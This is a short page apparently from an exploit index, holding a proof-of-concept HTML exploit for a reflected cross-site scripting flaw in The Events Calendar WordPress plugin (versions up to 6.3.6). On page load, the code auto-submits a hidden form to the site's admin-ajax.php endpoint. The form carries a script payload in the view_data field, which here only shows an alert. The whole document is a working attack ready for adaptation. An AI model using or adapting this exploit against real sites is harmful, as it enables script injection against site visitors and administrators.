Share
## https://sploitus.com/exploit?id=WPEX-ID:B2A92316-E404-4A5E-8426-F88DF6E87550
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>The Events Calendar <= 6.3.6 - Reflected XSS</title>
</head>
<body onload="document.getElementById('autoSubmitForm').submit();">
    <form id="autoSubmitForm" action="http://vulnerablesite.tld/wp-admin/admin-ajax.php" method="POST">
        <input type="hidden" name="action" value="tribe_events_views_v2_fallback">
        <input type="hidden" name="view" value="reflector">
        <input type="hidden" name="view_data[lala]" value="<svg onload=alert(document.domain);></svg>">
    </form>
</body>
</html>